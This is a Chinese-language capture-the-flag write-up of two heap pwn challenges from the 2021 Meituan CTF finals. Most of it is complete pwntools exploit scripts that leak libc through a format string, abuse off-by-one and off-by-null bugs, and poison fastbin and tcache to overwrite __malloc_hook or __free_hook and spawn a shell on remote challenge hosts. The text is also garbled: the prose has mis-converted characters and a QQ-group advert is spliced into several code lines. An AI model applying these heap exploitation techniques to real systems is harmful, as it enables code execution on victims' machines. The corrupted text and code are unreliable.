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关于网络安全:砰砰砰2021美团CTF决赛PWN题详解

nullheap


程序剖析

Add()

Delete
很失常的 delete

思路

offset by one, 简略的破绽, 还能够泄露地址
确定下 libc 版本
利用 offset by one 溢出一个批改一个 chunksize 为 0x90, 而后开释他,
如果是 2.23 的那么就会触发向前合并, 引发谬误, 如果是 2.27 就会间接进入 tcache, 不会报错

依据 libc 地址确定是 libc2.23-UB1.3

泄露地址

格式化字符串泄露地址

任意写

UB 隔块合并打 fastbin, 利用 0x7F 伪造 size, 而后 realloc 调栈, OGG

EXP

#! /usr/bin/python
# coding=utf-8
import sys
from pwn import *
from random import randint

context.log_level = 'debug'
context(arch='amd64', os='linux')

elf = ELF('./pwn')
libc=ELF('./libc.so.6')


def Log(name):    
    log.success(name+'='+hex(eval(name)))

if(len(sys.argv)==1):            #local
    sh = process('./pwn')
    print(sh.pid)
    raw_input() +QQ 君样:581499282 一起吹水聊天
    #proc_base = sh.libs()['/home/parallels/pwn']
else:                            #remtoe
    sh = remote('114.215.144.240', 11342)

def Num(n):
    sh.sendline(str(n))

def Cmd(n):
    sh.recvuntil('Your choice :')
    sh.send(str(n).ljust(4, '\x00'))

def Add(idx, size, cont):
    Cmd(1)
    sh.recvuntil('Where?')
    sh.send(str(idx).ljust(0x30, '\x00'))
    sh.recvuntil('Big or small??')
    sh.send(str(size).ljust(0x8, '\x00'))
    sh.recvuntil('Content:')
    sh.send(cont)

def Free(idx):
    Cmd(2)
    sh.recvuntil('Index:')
    sh.send(str(idx).ljust(6, '\x00'))



Add(0, 0x20, '%15$p')
sh.recvuntil('Your input:')
libc.address = int(sh.recv(14), 16)-0x20840
Log('libc.address')

Add(0, 0x90, 'A'*0x90)
Add(1, 0x60, 'B'*0x60)
Add(2, 0x28, 'C'*0x28)
Add(3, 0xf0, 'D'*0xF0)
Add(4, 0x38, '/bin/sh\x00')

Free(0)        #UB<=>A
Free(2)        #Fastbin->C
Add(2, 0x28, 'C'*0x20+flat(0x140)+'\x00')
Free(3)        #UB<=>(A, B, C, D)

#Fastbin Attack
Free(1)
exp = 'A'*0x90
exp+= flat(0, 0x71)
exp+= flat(libc.symbols['__malloc_hook']-0x23)
Add(6, len(exp), exp)        #Fastbin->B->Hook

Add(7, 0x60, 'B'*0x60)
exp = '\x00'*(0x13-0x8)
exp+= p64(libc.address+0x4527a)
exp+= p64(libc.symbols['realloc'])
Add(8, 0x60, exp)

Cmd(1)
sh.recvuntil('Where?')
sh.send(str(9).ljust(0x30, '\x00'))
sh.recvuntil('Big or small??')
sh.send(str(0x70).ljust(0x8, '\x00'))

sh.interactive()+QQ 君样:581499282 一起吹水聊天


'''
ptrarray:        telescope 0x2020A0+0x0000555555554000 16
printf:            break *(0xE7C+0x0000555555554000)

0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

'''

总结

要留神多种破绽的组合, 一开始就没留神到格式化字符串破绽, 绕了些远路
2.23 下 free 时的合并操作, 没有查看 prev_size 与前一个 chunk 的 size, 因而能够通过原本就在 Bin 中的 chunk 绕过 UB 0x7F 伪造 size, 打 malloc_hook, 最初通过 realloc_hook 调整栈帧满足 OGG 条件, 惯例思路

WordPlay

逆向

sub_9BA()这个函数有问题, 无奈 F5

万恶之源是 sub rsp 时调配的栈空间太大了, 理论基本没用这么多

尝试间接 patche 程序

[addr]
>>> HEX(asm('mov [rbp-0x3d2c88], rdi'))
0x48 0x89 0xbd 0x78 0xd3 0xc2 0xff 
>>> HEX(asm('mov [rbp-0x000c88], rdi'))
0x48 0x89 0xbd 0x78 0xf3 0xff 0xff

lea 指令
>>> HEX(asm('lea rax, [rbp-0x3D2850]'))
0x48 0x8d 0x85 0xb0 0xd7 0xc2 0xff 
>>> HEX(asm('lea rax, [rbp-0x000850]'))
0x48 0x8d 0x85 0xb0 0xf7 0xff 0xff 

sub 指令
>>> HEX(asm('sub rsp, 0x3d2c90'))
0x48 0x81 0xec 0x90 0x2c 0x3d 0x0 
>>> HEX(asm('sub rsp, 0xc90'))
0x48 0x81 0xec 0x90 0xc 0x0 0x0 

memset 的 n 参数
>>> HEX(asm('mov edx, 0x3d2844'))
0xba 0x44 0x28 0x3d 0x0 
>>> HEX(asm('mov edx, 0x000844'))
0xba 0x44 0x8 0x0 0x0 


>>> HEX(asm('sub rax, 0x3d2850'))
0x48 0x2d 0x50 0x28 0x3d 0x0 
>>> HEX(asm('sub rax, 0x000850'))
0x48 0x2d 0x50 0x8 0x0 0x0 ```
0xd3 0xc2 => 0xF3 0xFF

from ida_bytes import get_bytes, patch_bytes
import re
addr = 0x9C5
end = 0xD25

buf = get_bytes(addr, end-addr)
'''pattern = r"\xd3\xc2"patch ='\xF3\xff'buf = re.sub(pattern, patch, buf)'''
pattern = r"\xd7\xc2"
patch = '\xF7\xff'
buf = re.sub(pattern, patch, buf)

patch_bytes(addr, buf)
print("Done")


不胜利, 间接改 gihra 逆向

char * FUN_001009ba(char *param_1,int param_2)

{
  uint uVar1;
  long lVar2;
  long in_FS_OFFSET;
  char *pcVar3;
  int iVar4;
  int iVar5;
  int iVar6;
  int iVar7;
  
  lVar2 = *(long *)(in_FS_OFFSET + 0x28);
  if (1 < param_2) {memset(&stack0xffffffffffc2d3a8,0,0x400);
    iVar4 = 0;
    while (iVar4 < param_2) {uVar1 = (int)param_1[iVar4] & 0xff;
      *(int *)(&stack0xffffffffffc2d3a8 + (ulong)uVar1 * 4) =
           *(int *)(&stack0xffffffffffc2d3a8 + (ulong)uVar1 * 4) + 1;
      if (0xe < *(int *)(&stack0xffffffffffc2d3a8 + (ulong)uVar1 * 4)) {
        param_1 = s_ERROR_00302010;
        goto LAB_00100d10;
      }
      iVar4 = iVar4 + 1;
    }
    memset(&stack0xffffffffffc2d7a8,0,0x3d2844);
    iVar4 = 1;
    while (iVar4 < param_2) {*(undefined4 *)(&stack0xffffffffffc2d7a8 + (long)iVar4 * 0xfa8) = 1;
      *(undefined4 *)(&stack0xffffffffffc2d7a8 + ((long)(iVar4 + -1) + (long)iVar4 * 0x3e9) * 4) = 1
      ;
      iVar4 = iVar4 + 1;
    }
    iVar5 = 0;
    iVar6 = 0;
    iVar4 = 2;
    while (iVar4 <= param_2) {
      iVar7 = 0;
      while (iVar7 < (param_2 - iVar4) + 1) {if (((param_1[iVar7] == param_1[iVar7 + iVar4 + -1]) &&
            (*(int *)(&stack0xffffffffffc2d7a8 +
                     ((long)(iVar7 + iVar4 + -2) + (long)(iVar7 + 1) * 0x3e9) * 4) != 0)) &&
           (*(undefined4 *)
             (&stack0xffffffffffc2d7a8 + ((long)(iVar7 + iVar4 + -1) + (long)iVar7 * 0x3e9) * 4) = 1
           , iVar6 < iVar4 + -1)) {
          iVar6 = iVar4 + -1;
          iVar5 = iVar7;
        }
        iVar7 = iVar7 + 1;
      }
      iVar4 = iVar4 + 1;
    }
    pcVar3 = param_1;
    param_1 = (char *)malloc((long)param_2);
    iVar4 = 0;
    while (iVar4 <= iVar6) {param_1[iVar4] = pcVar3[iVar5];
      iVar4 = iVar4 + 1;
      iVar5 = iVar5 + 1;
    }
    param_1[iVar4] = '\0';
  }
LAB_00100d10:
  if (lVar2 == *(long *)(in_FS_OFFSET + 0x28)) {return param_1;+QQ 君样:581499282 一起吹水聊天}
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();}

丑化一下

char *PalyFunc(char *input, int len)

{
    uint ch;
    long canary;
    long in_FS_OFFSET;
    char *_input;
    int i;
    int start;
    int end;
    int iVar7;

    canary = *(long *)(in_FS_OFFSET + 0x28);
    if (1 < len)
    {
        // 统计字符
        int char_cnt[0x100];
        memset(char_cnt, 0, 0x400);
        int i = 0;
        while (i < len)
        {ch = (int)input[i];
            char_cnt[ch]++;
            if (0xe < char_cnt[ch]) // 字符最大不超过 14 个
            {
                input = "ERROR";
                goto ret;
            }
            i++;
        }

        int buf2[1000][0x3ea];
        memset(&buf2, 0, 0x3d2844);
        int j = 1;
        while (j < len)
        {buf2[j][0] = 1;
            buf2[j][-1] = 1;
            j++;
        }

        start = 0;
        end = 0;
        int k = 2;
        while (k <= len)
        {
            int m = 0;
            while (m < (len - k) + 1)
            {if ((input[m] == input[m + k + -1]) &&
                    (buf2[m + 1][k - 2 - 1] != 0) &&
                    (buf2[m][k - 1] = 1, end < k - 1))
                {end = k - 1; //max(end) = max(k) -1 = len -1
                    start = m;
                }
                m = m + 1;
            }
            k++;
        }

        _input = input;
        input = (char *)malloc((long)len);
        i = 0;
        while (i <= end)
        {input[i] = _input[start];
            i++;
            start = start + 1;
        }
        input[i] = '\0'; //i=end+1
    }

ret:
    if (canary == *(long *)(in_FS_OFFSET + 0x28))
    {return input;}
    __stack_chk_fail();}

49 行的循环感觉很奇怪, py 模仿找下法则

Len = 0x18+QQ 君样:581499282 一起吹水聊天
k = 2
while(k<=Len):

    m=0
    print("k=%d"%(k))
    while(m<(Len-k)+1):
        print("\tinput[%d]==input[%d]"%(m, m+k-1))
        m+=1
    print(' ')
    k+=1


发现是个反复字符串相干的

破绽

最初 input[i] =‘\0’; 时有一个 offset by null
循环完结时, i=end+1
end=k-1, 因而 max(end) = max(k)-1
k 最大 = len
综上, i 最大为 len, 溢出

接下来就是漫漫结构路, 因为算法间接逆不进去, 就只能凭感觉去 fuzz, 最终测试进去发现回文串时, 能够让 k =len

思路

所以此时题目就和 Play 无关了, Play 只是提供了一个 offset by null 而已

题目就变成了 2.27 下的 offset by null

惯例手法: 踩掉 P 标记, 结构隔块合并, 而后接触 Tcache

Play 去踩 P 标记时没法伪造 size, 解决办法:

踩完之后 free 掉, 再通过 Add 申请写入数据, 就能够在保留 P = 0 的前提下, 伪造 prev_size 了

EXP

#! /usr/bin/python
# coding=utf-8
import sys
from pwn import *
from random import randint

context.log_level = 'debug'
context(arch='amd64', os='linux')

elf = ELF('./pwn')
libc=ELF('./libc.so.6')


def Log(name):    
    log.success(name+'='+hex(eval(name)))

if(len(sys.argv)==1):            #local
    sh = process('./pwn')
    #proc_base = sh.libs()['/home/parallels/pwn']
else:                            #remtoe
    sh = remote('114.215.144.240', 41699)

def Num(n):
    sh.sendline(str(n))

def Cmd(n):
    sh.recvuntil('>>>')
    Num(n)

def Add(size, cont):
    Cmd(1)
    sh.recvuntil('Input len:\n')
    Num(size)
    sh.recvuntil('Input content:\n')
    sh.send(cont)

def Delete(idx):
    Cmd(2)
    sh.recvuntil('Input idx:\n')
    Num(idx)

def Play(idx):
    Cmd(3)
    sh.recvuntil('Input idx:\n')
    Num(idx)

#chunk arrange
for i in range(9):
    Add(0xF0, str(i)*0xF0)
Add(0x20, 'A'*0x20)
Add(0x18, 'ABCCBA'*0x4)
Add(0x18, 'C'*0x18)
Add(0xF0, 'D'*0xF0)+QQ 君样:581499282 一起吹水聊天
Add(0x20, 'gap')

#leak libc addr
for i in range(9):
    Delete(i)        #UB<=>(C7, C8)
for i in range(7):
    Add(0xF0, 'A'*0xF0)
Add(0xF0, 'A'*8)    #get chunk C7
Play(7)

sh.recvuntil('Chal:\n')
sh.recvuntil('A'*8)
libc.address = u64(sh.recv(6).ljust(8, '\x00'))-0x3ebe90
Log('libc.address')

#offset by null
for i in range(8):        #UB<=>(C7, C8)
    Delete(i)
Delete(11)
Play(10)

#forge fake size
Delete(10)
Add(0x18, flat(0, 0, 0x270))
Delete(12)                #UB<=>(C7, C8, ..., A, B, C, D)

#tcache attack
Delete(9)
exp = '\x00'*0x1F0
exp+= flat(0, 0x31)
exp+= p64(libc.symbols['__free_hook']-0x8)    #ChunkA's fd
Add(len(exp), exp)        #Tcache[0x30]->Chunk A->hook

Add(0x20, '\x00'*0x20)
exp = '/bin/sh\x00'
exp+= p64(libc.symbols['system'])
Add(0x20, exp)

#getshell
Delete(3)

#gdb.attach(sh, '''
#telescope (0x202100+0x0000555555554000) 16
#heap bins
#''')



sh.interactive()


'''
ResArr:            telescope (0x202040+0x0000555555554000)
PtrArr:            telescope (0x202100+0x0000555555554000)
flag{w0rd_Pl4y_13_vu1ner4bl3}
'''

​​​
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总结

本题最外围的中央在与逆向的过程, 更偏差实在环境, 咱们不可能也不须要弄明确每一条指令, 弄清楚什么操作会导致什么成果即可, 这个操作的粒度能够大一些

在本题中 PlayFunc()函数在找破绽时, 只须要关注与 pwn 相干的, 算法相干能够放一放

只用关注 malloc 前面的写入操作是如何定界的
关注怎么循环才能够失去我想要的值

最初就是凭感觉 fuzz 了, 结构非凡样例

退出移动版